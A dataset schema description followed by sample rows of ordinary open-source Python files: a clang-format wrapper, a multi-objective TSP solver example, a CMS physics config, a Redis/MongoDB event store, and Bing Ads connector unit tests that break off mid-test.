Dataset schema (column: type, observed range or number of classes):

- blob_id: string (length 40)
- directory_id: string (length 40)
- path: string (length 4 to 721)
- content_id: string (length 40)
- detected_licenses: list (length 0 to 57)
- license_type: string (2 classes)
- repo_name: string (length 5 to 91)
- snapshot_id: string (length 40)
- revision_id: string (length 40)
- branch_name: string (321 classes)
- visit_date: timestamp[ns] (2016-08-12 09:31:09 to 2023-09-06 10:45:07)
- revision_date: timestamp[ns] (2010-09-28 14:01:40 to 2023-09-06 06:22:19)
- committer_date: timestamp[ns] (2010-09-28 14:01:40 to 2023-09-06 06:22:19)
- github_id: int64 (426 to 681M)
- star_events_count: int64 (101 to 243k)
- fork_events_count: int64 (0 to 110k)
- gha_license_id: string (23 classes)
- gha_event_created_at: timestamp[ns] (2012-06-28 18:51:49 to 2023-09-14 21:59:16, nullable)
- gha_created_at: timestamp[ns] (2008-02-11 22:55:26 to 2023-08-10 11:14:58, nullable)
- gha_language: string (147 classes)
- src_encoding: string (26 classes)
- language: string (2 classes)
- is_vendor: bool
- is_generated: bool
- length_bytes: int64 (6 to 10.2M)
- extension: string (115 classes)
- filename: string (length 3 to 113)
- content: string (length 6 to 10.2M)
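For reference, a minimal sketch of streaming and filtering rows with this schema using the Hugging Face `datasets` library (the dataset path below is a placeholder, not the actual dataset name):

    from datasets import load_dataset

    # Stream rows instead of downloading the full dataset
    ds = load_dataset("<dataset-path>", split="train", streaming=True)

    # Keep permissively licensed, human-written files under 1 MB
    keep = ds.filter(
        lambda row: row["license_type"] == "permissive"
        and not row["is_vendor"]
        and not row["is_generated"]
        and row["length_bytes"] < 1_000_000
    )

    for row in keep.take(3):
        print(row["repo_name"], row["path"], row["length_bytes"])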
Row 1:
- blob_id: 345f5a9f62ca1f3e41b10d550144926830ab4537
- directory_id: 7e6afb4986a53c420d40a2039240f8c5ed3f9549
- path: /scripts/clang_git_format/clang_git_format/clang_format.py
- content_id: 584a7d860f7107600abb10c64550912981eee064
- detected_licenses: ["Apache-2.0", "BSD-3-Clause"]
- license_type: permissive
- repo_name: MRPT/mrpt
- snapshot_id: 9ea3c39a76de78eacaca61a10e7e96646647a6da
- revision_id: 34077ec74a90b593b587f2057d3280ea520a3609
- branch_name: refs/heads/develop
- visit_date: 2023-08-17T23:37:29.722496
- revision_date: 2023-08-17T15:39:54
- committer_date: 2023-08-17T15:39:54
- github_id: 13,708,826
- star_events_count: 1,695
- fork_events_count: 646
- gha_license_id: BSD-3-Clause
- gha_event_created_at: 2023-09-12T22:02:53
- gha_created_at: 2013-10-19T21:09:23
- gha_language: C++
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 5,301
- extension: py
- filename: clang_format.py
- content:
import difflib
from distutils import spawn
import glob
import os
import sys
import threading
import subprocess
import logging
from .config import (PROGNAME)
from .utils import (
callo,
)
logger = logging.getLogger("clang-format")
class ClangFormat:
"""Find clang-format and linting/formating individual files.
"""
def __init__(self, clang_path, cache_dir):
"""Initialization method.
"""
self.clang_path = None
self.clang_format_progname_ext = ""
if sys.platform == "win32":
self.clang_format_progname_ext += ".exe"
# Check the clang-format the user specified
if clang_path is not None:
if os.path.isfile(clang_path):
self.clang_path = clang_path
        # Check the user's PATH environment variable now
if self.clang_path is None:
            # Check for various versions, starting with binaries that have
            # version-specific suffixes in the user's PATH
programs = [
PROGNAME
]
if sys.platform == "win32":
for i in range(len(programs)):
programs[i] += '.exe'
for program in programs:
self.clang_path = spawn.find_executable(program)
if self.clang_path:
if not self._validate_version():
self.clang_path = None
else:
break
# If Windows, try to grab it from Program Files
# Check both native Program Files and WOW64 version
if sys.platform == "win32":
programfiles = [
os.environ["ProgramFiles"],
os.environ["ProgramFiles(x86)"],
]
for programfile in programfiles:
win32bin = os.path.join(programfile,
"LLVM\\bin\\clang-format.exe")
if os.path.exists(win32bin):
self.clang_path = win32bin
break
        # Not found yet -- fall back to a previously cached binary
if self.clang_path is None:
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
self.clang_path = os.path.join(cache_dir,
PROGNAME
+ self.clang_format_progname_ext)
            # Error out if the cache is empty or the cached binary is stale
if not os.path.isfile(self.clang_path) \
or not self._validate_version():
logger.error("Haven't found a valid %s version in PATH. ",
PROGNAME)
sys.exit(1)
# Validate we have the correct version
# We only can fail here if the user specified a clang-format binary and
# it is the wrong version
if not self._validate_version():
logger.error("Exiting because of previous warning.")
sys.exit(1)
self.print_lock = threading.Lock()
def _validate_version(self):
"""Validate clang-format is the expected version
"""
cf_version = callo([self.clang_path, "--version"])
logger.warning("Using clang-format: %s", str(cf_version))
return True
def _lint(self, file_name, print_diff):
"""Check the specified file has the correct format
"""
        with open(file_name, 'rb') as fo:
            original_file = fo.read().decode('utf-8')
# Get formatted file as clang-format would format the file
formatted_file = callo(
[self.clang_path, "--style=file", file_name]).decode('utf-8')
if original_file != formatted_file:
if print_diff:
original_lines = original_file.splitlines(keepends=True)
formatted_lines = formatted_file.splitlines(keepends=True)
result = difflib.unified_diff(original_lines, formatted_lines)
# Take a lock to ensure diffs do not get mixed when printed to
# the screen
with self.print_lock:
logger.error("Found diff for %s", file_name)
logger.info("To fix formatting errors, run %s "
"--style=file -i %s", self.clang_path,
file_name)
sys.stderr.writelines(result)
return False
return True
def lint(self, file_name):
"""Check the specified file has the correct format
"""
return self._lint(file_name, print_diff=True)
def format_func(self, file_name):
"""Update the format of the specified file
"""
if self._lint(file_name, print_diff=False):
return True
# Update the file with clang-format
formatted = not subprocess.call(
[self.clang_path, "--style=file", "-i", file_name])
# Version 3.8 generates files like foo.cpp~RF83372177.TMP when it
# formats foo.cpp on Windows, we must clean these up
if sys.platform == "win32":
glob_pattern = file_name + "*.TMP"
for fglob in glob.glob(glob_pattern):
os.unlink(fglob)
return formatted
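# A minimal usage sketch (hypothetical paths; assumes PROGNAME from .config
# names the clang-format binary to search for):
#
#   cf = ClangFormat(clang_path=None, cache_dir="/tmp/clang-format-cache")
#   cf.lint("src/foo.cpp")         # prints a diff, returns False if misformatted
#   cf.format_func("src/foo.cpp")  # rewrites the file in place with --style=file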
Row 2:
- blob_id: b0e3867e9d255729b4f307c849d9ddf78036ba2c
- directory_id: 4c8ce1a65c1543d8411b990340b0ccb84bfcf18a
- path: /examples/unfinished/tsp_mo.py
- content_id: 1b0430264a49f8565a5d18b1a8ff08654737fb83
- detected_licenses: ["MIT"]
- license_type: permissive
- repo_name: scipopt/PySCIPOpt
- snapshot_id: e7b92c39ea1cdc32a123669614e4c06bee4b73eb
- revision_id: c6329760618a88e43e32d164e363ed233499de91
- branch_name: refs/heads/master
- visit_date: 2023-09-03T13:35:16.769766
- revision_date: 2023-07-03T08:33:49
- committer_date: 2023-07-03T08:33:49
- github_id: 59,214,089
- star_events_count: 390
- fork_events_count: 92
- gha_license_id: MIT
- gha_event_created_at: 2023-08-07T10:44:19
- gha_created_at: 2016-05-19T14:29:21
- gha_language: Cython
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 10,031
- extension: py
- filename: tsp_mo.py
- content:
"""
tsp_mo.py: solve the multi-objective traveling salesman problem
Approaches:
- segmentation
- ideal point
- scalarization
Copyright (c) by Joao Pedro PEDROSO and Mikio KUBO, 2012
"""
import math
import random
from pyscipopt import Model, quicksum, multidict
def optimize(model,cand):
"""optimize: function for solving the model, updating candidate solutions' list
Will add to cand all the intermediate solutions found, as well as the optimum
Parameters:
    - model: SCIP model object
- cand: list of pairs of objective functions (for appending more solutions)
Returns the solver's exit status
"""
model.hideOutput()
model.optimize()
x,y,C,T = model.data
status = model.getStatus()
if status == "optimal":
# collect suboptimal solutions
solutions = model.getSols()
for sol in solutions:
            cand.append((model.getSolVal(sol, T), model.getSolVal(sol, C)))
return status
def base_model(n,c,t):
"""base_model: mtz model for the atsp, prepared for two objectives
Loads two additional variables/constraints to the mtz model:
- C: sum of travel costs
- T: sum of travel times
Parameters:
- n: number of cities
- c,t: alternative edge weights, to compute two objective functions
Returns list of candidate solutions
"""
from atsp import mtz_strong
model = mtz_strong(n,c) # model for minimizing cost
x,u = model.data
# some auxiliary information
C = model.addVar(vtype="C", name="C") # for computing solution cost
T = model.addVar(vtype="C", name="T") # for computing solution time
model.addCons(T == quicksum(t[i,j]*x[i,j] for (i,j) in x), "Time")
model.addCons(C == quicksum(c[i,j]*x[i,j] for (i,j) in x), "Cost")
model.data = x,u,C,T
return model
def solve_segment_time(n,c,t,segments):
"""solve_segment: segmentation for finding set of solutions for two-objective TSP
Parameters:
- n: number of cities
- c,t: alternative edge weights, to compute two objective functions
- segments: number of segments for finding various non-dominated solutions
Returns list of candidate solutions
"""
model = base_model(n,c,t) # base model for minimizing cost or time
x,u,C,T = model.data
# store the set of solutions for plotting
cand = []
# print("optimizing time"
model.setObjective(T, "minimize")
stat1 = optimize(model,cand)
# print("optimizing cost"
model.setObjective(C, "minimize")
stat2 = optimize(model,cand)
if stat1 != "optimal" or stat2 != "optimal":
return []
times = [ti for (ti,ci) in cand]
max_time = max(times)
min_time = min(times)
delta = (max_time-min_time)/segments
# print("making time range from",min_time,"to",max_time
# add a time upper bound constraint, moving between min and max values
TimeCons = model.addCons(T <= max_time, "TimeCons")
for i in range(segments+1):
time_ub = max_time - delta*i
model.chgRhs(TimeCons, time_ub)
# print("optimizing cost subject to time <=",time_ub
optimize(model,cand)
return cand
def solve_ideal(n,c,t,segments):
"""solve_ideal: use ideal point for finding set of solutions for two-objective TSP
Parameters:
- n: number of cities
- c,t: alternative edge weights, to compute two objective functions
- segments: number of segments for finding various non-dominated solutions
Returns list of candidate solutions
"""
model = base_model(n,c,t) # base model for minimizing cost or time
x,u,C,T = model.data
# store the set of solutions for plotting
cand = []
# print("optimizing time"
model.setObjective(T, "minimize")
stat1 = optimize(model,cand)
# print("optimizing cost"
model.setObjective(C, "minimize")
stat2 = optimize(model,cand) #find the minimum cost routes
if stat1 != "optimal" or stat2 != "optimal":
return []
times = [ti for (ti,ci) in cand]
costs = [ci for (ti,ci) in cand]
min_time = min(times)
min_cost = min(costs)
# print("ideal point:",min_time,",",min_cost
    #===============================================================
    # Minimize the squared weighted distance to the ideal point:
    # lambda*f1^2 + (1-lambda)*f2^2, where f1 = sum(t*x) - min_time
    # and f2 = sum(c*x) - min_cost
f1 = model.addVar(vtype="C", name="f1")
f2 = model.addVar(vtype="C", name="f2")
model.addCons(f1 == T - min_time, "obj1")
model.addCons(f2 == C - min_cost, "obj2")
# print("optimizing distance to ideal point:"
for i in range(segments+1):
lambda_ = float(i)/segments
# print(lambda_
z = model.addVar(name="z")
Obj = model.addCons(lambda_*f1*f1 + (1-lambda_)*f2*f2 == z)
model.setObjective(z, "minimize")
optimize(model, cand) # find the minimum cost routes
return cand
def solve_scalarization(n,c,t):
"""solve_scalarization: scale objective function to find new point
Parameters:
- n: number of cities
- c,t: alternative edge weights, to compute two objective functions
Returns list of candidate solutions
"""
model = base_model(n,c,t) # base model for minimizing cost or time
x,u,C,T = model.data
def explore(C1,T1,C2,T2,front):
"""explore: recursively try to find new non-dominated solutions with a scaled objective
Parameters:
        - C1,T1: cost and time of leftmost point
        - C2,T2: cost and time of rightmost point
- front: current set of non-dominated solutions
Returns the updated front
"""
alpha = float(C1 - C2)/(T2 - T1)
# print("%s,%s -- %s,%s (%s)..." % (C1,T1,C2,T2,alpha)
init = list(front)
model.setObjective(quicksum((c[i,j] + alpha*t[i,j])*x[i,j] for (i,j) in x), "minimize")
optimize(model,front)
front = pareto_front(front)
# print("... added %s points" % (len(front)-len(init))
if front == init:
# print("no points added, returning"
return front
CM = model.getVal(C)
TM = model.getVal(T)
# print("will explore %s,%s -- %s,%s and %s,%s -- %s,%s" % (C1,T1,CM,TM,CM,TM,C2,T2)
if TM > T1:
front = explore(C1,T1,CM,TM,front)
if T2 > TM:
front = explore(CM,TM,C2,T2,front)
return front
    cand = []  # store the set of solutions for plotting
model.setObjective(T, "minimize")
stat = optimize(model,cand)
if stat != "optimal":
return []
C1 = model.getVal(C)
T1 = model.getVal(T)
# change the objective function to minimize the travel cost
model.setObjective(C, "minimize")
stat = optimize(model,cand)
if stat != "optimal":
return []
C2 = model.getVal(C)
T2 = model.getVal(T)
front = pareto_front(cand)
return explore(C1,T1,C2,T2,front)
def distance(x1,y1,x2,y2):
return math.sqrt((x2-x1)**2 + (y2-y1)**2)
def make_data(n):
x,y = {},{} # positions in the plane
c,t = {},{} # cost, time
for i in range(1,n+1):
x[i] = random.random()
y[i] = random.random()
for i in range(1,n+1):
for j in range(1,n+1):
c[i,j] = distance(x[i],y[i],x[j],y[j])
t[i,j] = 1/(c[i,j]+1.0)+0.3*random.random()
return c,t,x,y
if __name__ == "__main__":
from pareto_front import pareto_front
random.seed(7)
n = 20
c,t,x,y = make_data(n)
print("\n\n\nmultiobjective optimization: segmentation with additional (time) constraint")
segments = 6
cand_seg_time = solve_segment_time(n,c,t,segments)
print("candidate solutions:")
for cand in cand_seg_time:
print("\t",cand)
front_seg_time = pareto_front(cand_seg_time)
print("pareto front:",len(front_seg_time),"points out of",len(cand_seg_time))
for cand in front_seg_time:
print("\t",cand)
print("\n\n\nmultiobjective optimization: min distance to ideal point")
cand_ideal = solve_ideal(n,c,t,segments)
print("candidate solutions:")
for cand in cand_ideal:
print("\t",cand)
front_ideal = pareto_front(cand_ideal)
print("pareto front:",len(front_ideal),"points out of",len(cand_ideal))
for cand in front_ideal:
print("\t",cand)
print("\n\n\nmultiobjective optimization: scalarization strategy")
front_scalarization = solve_scalarization(n,c,t)
front_scalarization.sort()
print("front solutions:")
for cand in front_scalarization:
print("\t",cand)
assert front_scalarization == pareto_front(front_scalarization)
try:
import matplotlib.pyplot as P
    except ImportError:
print("for graphics, install matplotlib")
exit(0)
P.clf()
P.xlabel("cost")
P.ylabel("time")
P.title("Pareto front")
# plot pareto front - scalarization
t = [ti for (ti,ci) in front_scalarization]
c = [ci for (ti,ci) in front_scalarization]
P.plot(t,c,"bo",c="black")
t = [ti for (ti,ci) in front_scalarization]
c = [ci for (ti,ci) in front_scalarization]
P.plot(t,c,c="black",lw=3,label="scalarization")
# plot pareto front - segmentation (time)
t = [ti for (ti,ci) in cand_seg_time]
c = [ci for (ti,ci) in cand_seg_time]
P.plot(t,c,"bo",c="cyan")
allpoints = [(ti,ci) for (ti,ci) in cand_seg_time]
t = [ti for (ti,ci) in front_seg_time]
c = [ci for (ti,ci) in front_seg_time]
P.plot(t,c,c="cyan",lw=3,label="segmentation (time)")
# plot pareto front - -ideal point
t = [ti for (ti,ci) in cand_ideal]
c = [ci for (ti,ci) in cand_ideal]
P.plot(t,c,"bo",c="red")
allpoints = [(ti,ci) for (ti,ci) in cand_ideal]
t = [ti for (ti,ci) in front_ideal]
c = [ci for (ti,ci) in front_ideal]
P.plot(t,c,c="red",lw=3,label="ideal point")
P.legend()
P.savefig("tsp_mo_pareto_ideal.pdf",format="pdf")
P.show()
Row 3:
- blob_id: 6b8e58a3432fba7436a87f9a80c7428fe1d94014
- directory_id: a5a99f646e371b45974a6fb6ccc06b0a674818f2
- path: /PhysicsTools/PatAlgos/python/selectionLayer1/displacedMuonSelector_cfi.py
- content_id: 5de4cb6fd54f5f96b2c9ed51a1016f577001c181
- detected_licenses: ["Apache-2.0"]
- license_type: permissive
- repo_name: cms-sw/cmssw
- snapshot_id: 4ecd2c1105d59c66d385551230542c6615b9ab58
- revision_id: 19c178740257eb48367778593da55dcad08b7a4f
- branch_name: refs/heads/master
- visit_date: 2023-08-23T21:57:42.491143
- revision_date: 2023-08-22T20:22:40
- committer_date: 2023-08-22T20:22:40
- github_id: 10,969,551
- star_events_count: 1,006
- fork_events_count: 3,696
- gha_license_id: Apache-2.0
- gha_event_created_at: 2023-09-14T19:14:28
- gha_created_at: 2013-06-26T14:09:07
- gha_language: C++
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 212
- extension: py
- filename: displacedMuonSelector_cfi.py
- content:
import FWCore.ParameterSet.Config as cms
# module to select displacedMuons
#
selectedPatDisplacedMuons = cms.EDFilter("PATMuonSelector",
src = cms.InputTag("patDisplacedMuons"),
cut = cms.string("")
)
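# A minimal customization sketch (hypothetical cut expression; any selection
# string understood by PATMuonSelector works the same way):
#   selectedPatDisplacedMuons.cut = cms.string("pt > 5. && abs(eta) < 2.4")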
Row 4:
- blob_id: 0049597f101849b6839e8ab31e0f8515085d57b5
- directory_id: 0b4a95ce694695086e1ad43b4327f0f539361c4f
- path: /jamboree/base/old/refactor.py
- content_id: b316da0953c1080a444ee0c9cc0898b72e102119
- detected_licenses: []
- license_type: no_license
- repo_name: kivo360/jamboree
- snapshot_id: 68f3bf855e3058a0007ea18742f285a5dab1a9bb
- revision_id: 235a49ac83e734a166458efc57738c5559f5124e
- branch_name: refs/heads/master
- visit_date: 2023-01-04T22:40:24.166459
- revision_date: 2020-10-08T21:10:04
- committer_date: 2020-10-08T21:10:04
- github_id: 222,349,483
- star_events_count: 138
- fork_events_count: 1
- gha_license_id: null
- gha_event_created_at: 2020-11-05T10:27:52
- gha_created_at: 2019-11-18T02:44:45
- gha_language: Python
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 11,187
- extension: py
- filename: refactor.py
- content:
import base64
import random
from abc import ABC
from copy import copy
from multiprocessing import cpu_count
from typing import List
import maya
import orjson
import ujson
from loguru import logger
from pebble.pool import ThreadPool
from redis import Redis
from funtime import Store
from jamboree.storage.databases import (MongoDatabaseConnection,
RedisDatabaseConnection)
class EventProcessor(ABC):
def save(self, query: dict, data: dict, abs_rel="absolute"):
raise NotImplementedError
def save_many(self, query: dict, data: List[dict], abs_rel="absolute"):
raise NotImplementedError
def get_latest(self, query, abs_rel="absolute") -> dict:
raise NotImplementedError
def get_latest_many(self, query, abs_rel="absolute", limit=1000):
raise NotImplementedError
def get_between(self, query:dict, min_epoch:float, max_epoch:float, abs_rel:str="absolute") -> list:
raise NotImplementedError
def get_latest_by(self, query:dict, max_epoch, abs_rel="absolute", limit:int=10) -> dict:
raise NotImplementedError
def count(self, query: dict) -> int:
raise NotImplementedError
def remove_first(self, query: dict):
raise NotImplementedError
def pop_multiple(self, query: dict, limit: int):
raise NotImplementedError
def _bulk_save(self, query: dict, data: list):
raise NotImplementedError
def single_get(self, query:dict):
raise NotImplementedError
def single_set(self, query:dict, data:dict):
raise NotImplementedError
def single_delete(self, query:dict):
raise NotImplementedError
class Jamboree(EventProcessor):
"""Adds and retrieves events at extremely fast speeds. Use to handle portfolio and trade information quickly."""
def __init__(self, mongodb_host="localhost", redis_host="localhost", redis_port=6379):
self.redis = Redis(redis_host, port=redis_port)
self.store = Store(mongodb_host).create_lib('events').get_store()['events']
self.pool = ThreadPool(max_workers=cpu_count() * 4)
self.mongo_conn = MongoDatabaseConnection()
self.redis_conn = RedisDatabaseConnection()
self.mongo_conn.connection = self.store
self.redis_conn.connection = self.redis
# self.redis_conn.pool = self.pool
# self.mongo_conn.pool = self.pool
def _validate_query(self, query: dict):
""" Validates a query. Must have `type` and a second identifier at least"""
if 'type' not in query:
return False
if not isinstance(query['type'], str):
return False
if len(query) < 2:
return False
return True
def _generate_hash(self, query: dict):
_hash = ujson.dumps(query, sort_keys=True)
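        # sort_keys=True makes the serialization order-insensitive, so
        # {"type": "trade", "id": 1} and {"id": 1, "type": "trade"} map
        # to the same redis key.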
_hash = base64.b64encode(str.encode(_hash))
_hash = _hash.decode('utf-8')
return _hash
def _check_redis_for_prior(self, _hash: str) -> bool:
""" Checks to see if any """
prior_length = self.redis.llen(_hash)
if prior_length == 0:
return False
return True
def _update_dict(self, query: dict, data: dict):
query = copy(query)
timestamp = maya.now()._epoch
query['timestamp'] = timestamp
data.update(query)
return data
def _update_dict_no_timestamp(self, query: dict, data: dict):
query = copy(query)
data = copy(data)
data.update(query)
data.pop("timestamp", None)
return data
def _omit_timestamp(self, data: dict):
""" Removes timestamp if it exists. Use it to create a copied version of a dictionary to be saved in the duplicate list """
_data = copy(data)
_data.pop("timestamp", None)
return _data
def back_to_dict(self, list_of_serialized: list):
deserialized = []
if len(list_of_serialized) == 1:
return orjson.loads(list_of_serialized[0])
for i in list_of_serialized:
deserialized.append(orjson.loads(i))
return deserialized
def _save(self, query: dict, data: dict):
"""
        Given a type (data entity), data, and an epoch for time (UTC only), save the data in both redis and mongo.
Does it in a background process. Use with add event.
We save the information both in mongodb and redis. We assume there's many of each collection. We find a specific collection using the query.
"""
self.redis_conn.save(query, data)
self.pool.schedule(self.mongo_conn.save, args=(query, data))
"""
RESET FUNCTIONS
"""
def _reset_count(self, query: dict):
""" Reset the count for the current mongodb query. We do this by adding records in mongo back into redis. """
all_elements = self.mongo_conn.query_all(query)
self.pool.schedule(self.redis_conn.reset, args=(query, all_elements))
def reset(self, query: dict):
""" Resets all of the variables """
        self.pool.schedule(self._reset_count, args=(query,))
"""
DELETES FUNCTIONS
"""
    def _remove(self, query: dict, details: dict):
        """ Removes the given query information from both redis and mongo.
        It's a heavy computation on redis, as it'll require searching an entire list.
        """
        self.pool.schedule(self.mongo_conn.delete_all, args=(query, details))
        self.redis_conn.delete(query, details)
        self.pool.schedule(self.redis_conn.delete_all, args=(query,))
def _remove_first_redis(self, _hash, query: dict):
# rlock = f"{_hash}:lock"
# with self.redis.lock(rlock):
# push_key = f"{_hash}:list"
# self.redis.rpop(push_key)
pass
def remove_first(self, query: dict):
pass
# _hash = self._generate_hash(query)
# count = self._get_count(_hash, query)
# if count == 0:
# return
# self._remove_first_redis(_hash, query)
"""
SAVE FUNCTIONS
"""
def save(self, query: dict, data: dict):
self._save(query, data)
def save_many(self, query: dict, data: List[dict]):
        if not self._validate_query(query):
# Log a warning here instead
return
if len(data) == 0:
return
for item in data:
self._save(query, item)
def bulk_upsert_redis(self, query, data):
logger.info("Default retcon redis")
self.pool.schedule(self.redis_conn.update_many, args=(query, data))
def _bulk_save(self, query, data: list):
""" Bulk adds a list to redis."""
self.redis_conn.save_many(query, data)
self.pool.schedule(self.mongo_conn.save_many, args=(query, data))
def _save_redis(self, _hash: str, data: dict):
serialized = orjson.dumps(data)
rlock = f"{_hash}:lock"
with self.redis.lock(rlock):
push_key = f"{_hash}:list"
self.redis.rpush(push_key, serialized)
def _bulk_save_redis(self, _hash: str, data: list):
serialized_list = [orjson.dumps(x) for x in data]
rlock = f"{_hash}:lock"
with self.redis.lock(rlock):
push_key = f"{_hash}:list"
self.redis.rpush(push_key, *serialized_list)
def _pop_redis_multiple(self, _hash, limit: int):
rlock = f"{_hash}:lock"
with self.redis.lock(rlock):
with self.redis.pipeline() as pipe:
latest_items = []
try:
push_key = f"{_hash}:list"
pipe.watch(push_key)
latest_items = pipe.lrange(push_key, -limit, -1)
                    pipe.ltrim(push_key, 0, -(limit + 1))  # keep all but the last `limit` items
pipe.execute()
except Exception as e:
pass
finally:
pipe.reset()
if len(latest_items) > 0:
return self.back_to_dict(latest_items)
return latest_items
def pop_multiple(self, query, limit: int = 1):
""" Get multiple items """
_hash = self._generate_hash(query)
count = self._get_count(_hash, query)
if count == 0:
return []
return self._pop_redis_multiple(_hash, limit)
"""
Public Query Functions
"""
def query_direct(self, query):
""" Queries from mongodb directly. Used to search extremely large queries. """
latest_items = list(self.store.query_latest(query))
return latest_items
def query_direct_latest(self, query):
""" Queries from mongodb directly. Used to search extremely large queries. """
latest_items = list(self.store.query_latest(query))
if len(latest_items) > 0:
return latest_items[0]
return {}
def get_latest(self, query):
""" Gets the latest query"""
# Add a conditional time lock
_hash = self._generate_hash(query)
count = self._get_count(_hash, query)
if count > 0:
return self.back_to_dict(self.redis.lrange(f"{_hash}:list", -1, -1))
        # Fall back to mongo (slower)
latest_items = list(self.store.query_latest(query))
if len(latest_items) > 0:
return latest_items[0]
return {}
def get_latest_many(self, query: dict, limit=1000):
        if not self._validate_query(query): return []
_hash = self._generate_hash(query)
count = self._get_count(_hash, query)
if count == 0: return []
latest_redis_items = self.back_to_dict(self.redis.lrange(f"{_hash}:list", -limit, -1))
# TODO: Get mongo tasks here
# How will this work now?
rlen = len(latest_redis_items)
if rlen == 0:
query["limit"] = limit
latest_items = list(self.store.query_latest(query))
self.reset(query)
return latest_items
return latest_redis_items
"""
SEARCH ONE FUNCTIONS
"""
    def _search_one(self, item: dict, query: dict):
        all_bools = []
        for q in query:
            if q in item:
                if item[q] == query[q]:
                    all_bools.append(True)
                else:
                    all_bools.append(False)
            else:
                all_bools.append(False)
        return all(all_bools)
def _get_count(self, _hash: str, query: dict):
        # Check whether a count already exists in redis; if not, fall back to counting records in mongo.
        _count_hash = f"{_hash}:list"
        count = self.redis.llen(_count_hash)
        if count:
            return count
records = list(self.store.query(query))
record_len = len(records)
return record_len
    def count(self, query):
        """ Count the number of records matching the given query. """
        if not self._validate_query(query): return 0
_hash = self._generate_hash(query)
count = self._get_count(_hash, query)
return count
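# A minimal usage sketch (hypothetical query; assumes local MongoDB and Redis
# instances as wired up in __init__):
#
#   processor = Jamboree(mongodb_host="localhost", redis_host="localhost")
#   query = {"type": "trade", "symbol": "BTCUSD"}
#   processor.save(query, {"price": 100.0})
#   latest = processor.get_latest(query)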
Row 5:
- blob_id: 22ea63edcb8c121515e3bc205e6a47fce6acbc83
- directory_id: fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
- path: /dts/airbyte/airbyte-integrations/connectors/source-bing-ads/unit_tests/test_source.py
- content_id: b19fea3127ccecc370e2b9d7b3877934e1529ff2
- detected_licenses: ["MIT", "Elastic-2.0", "Apache-2.0", "BSD-3-Clause"]
- license_type: permissive
- repo_name: alldatacenter/alldata
- snapshot_id: 7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
- revision_id: 8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
- branch_name: refs/heads/master
- visit_date: 2023-08-05T07:32:25.442740
- revision_date: 2023-08-03T13:17:24
- committer_date: 2023-08-03T13:17:24
- github_id: 213,321,771
- star_events_count: 774
- fork_events_count: 250
- gha_license_id: Apache-2.0
- gha_event_created_at: 2023-09-06T17:35:32
- gha_created_at: 2019-10-07T07:36:18
- gha_language: null
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 5,995
- extension: py
- filename: test_source.py
- content:
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import json
from unittest.mock import patch
import pytest
import source_bing_ads
from airbyte_cdk.models import SyncMode
from source_bing_ads.source import AccountPerformanceReportMonthly, Accounts, AdGroups, Ads, Campaigns, SourceBingAds
@pytest.fixture(name="config")
def config_fixture():
"""Generates streams settings from a config file"""
CONFIG_FILE = "secrets/config.json"
with open(CONFIG_FILE, "r") as f:
return json.loads(f.read())
@pytest.fixture(name="logger_mock")
def logger_mock_fixture():
return patch("source_bing_ads.source.AirbyteLogger")
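# Patching "Client" on source_bing_ads.source (the module where it is looked
# up, not where it is defined) ensures SourceBingAds sees the mock, so the
# tests below never hit the real Bing Ads API.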
@patch.object(source_bing_ads.source, "Client")
def test_streams_config_based(mocked_client, config):
streams = SourceBingAds().streams(config)
assert len(streams) == 25
@patch.object(source_bing_ads.source, "Client")
def test_source_check_connection_ok(mocked_client, config, logger_mock):
with patch.object(Accounts, "read_records", return_value=iter([{"Id": 180519267}, {"Id": 180278106}])):
assert SourceBingAds().check_connection(logger_mock, config=config) == (True, None)
@patch.object(source_bing_ads.source, "Client")
def test_source_check_connection_failed(mocked_client, config, logger_mock):
with patch.object(Accounts, "read_records", return_value=0):
assert SourceBingAds().check_connection(logger_mock, config=config)[0] is False
@patch.object(source_bing_ads.source, "Client")
def test_campaigns_request_params(mocked_client, config):
campaigns = Campaigns(mocked_client, config)
request_params = campaigns.request_params(stream_slice={"account_id": "account_id"})
assert request_params == {
"AccountId": "account_id",
"CampaignType": "Audience DynamicSearchAds Search Shopping",
"ReturnAdditionalFields": "AdScheduleUseSearcherTimeZone BidStrategyId CpvCpmBiddingScheme DynamicDescriptionSetting DynamicFeedSetting MaxConversionValueBiddingScheme MultimediaAdsBidAdjustment TargetImpressionShareBiddingScheme TargetSetting VerifiedTrackingSetting",
}
@patch.object(source_bing_ads.source, "Client")
def test_campaigns_stream_slices(mocked_client, config):
campaigns = Campaigns(mocked_client, config)
accounts_read_records = iter([{"Id": 180519267, "ParentCustomerId": 100}, {"Id": 180278106, "ParentCustomerId": 200}])
with patch.object(Accounts, "read_records", return_value=accounts_read_records):
slices = campaigns.stream_slices()
assert list(slices) == [
{"account_id": 180519267, "customer_id": 100},
{"account_id": 180278106, "customer_id": 200},
]
@patch.object(source_bing_ads.source, "Client")
def test_adgroups_stream_slices(mocked_client, config):
adgroups = AdGroups(mocked_client, config)
accounts_read_records = iter([{"Id": 180519267, "ParentCustomerId": 100}, {"Id": 180278106, "ParentCustomerId": 200}])
campaigns_read_records = [iter([{"Id": 11}, {"Id": 22}]), iter([{"Id": 55}, {"Id": 66}])]
with patch.object(Accounts, "read_records", return_value=accounts_read_records):
with patch.object(Campaigns, "read_records", side_effect=campaigns_read_records):
slices = adgroups.stream_slices()
assert list(slices) == [
{"campaign_id": 11, "account_id": 180519267, "customer_id": 100},
{"campaign_id": 22, "account_id": 180519267, "customer_id": 100},
{"campaign_id": 55, "account_id": 180278106, "customer_id": 200},
{"campaign_id": 66, "account_id": 180278106, "customer_id": 200},
]
@patch.object(source_bing_ads.source, "Client")
def test_ads_request_params(mocked_client, config):
ads = Ads(mocked_client, config)
request_params = ads.request_params(stream_slice={"ad_group_id": "ad_group_id"})
assert request_params == {
"AdGroupId": "ad_group_id",
"AdTypes": {
"AdType": ["Text", "Image", "Product", "AppInstall", "ExpandedText", "DynamicSearch", "ResponsiveAd", "ResponsiveSearch"]
},
"ReturnAdditionalFields": "ImpressionTrackingUrls Videos LongHeadlines",
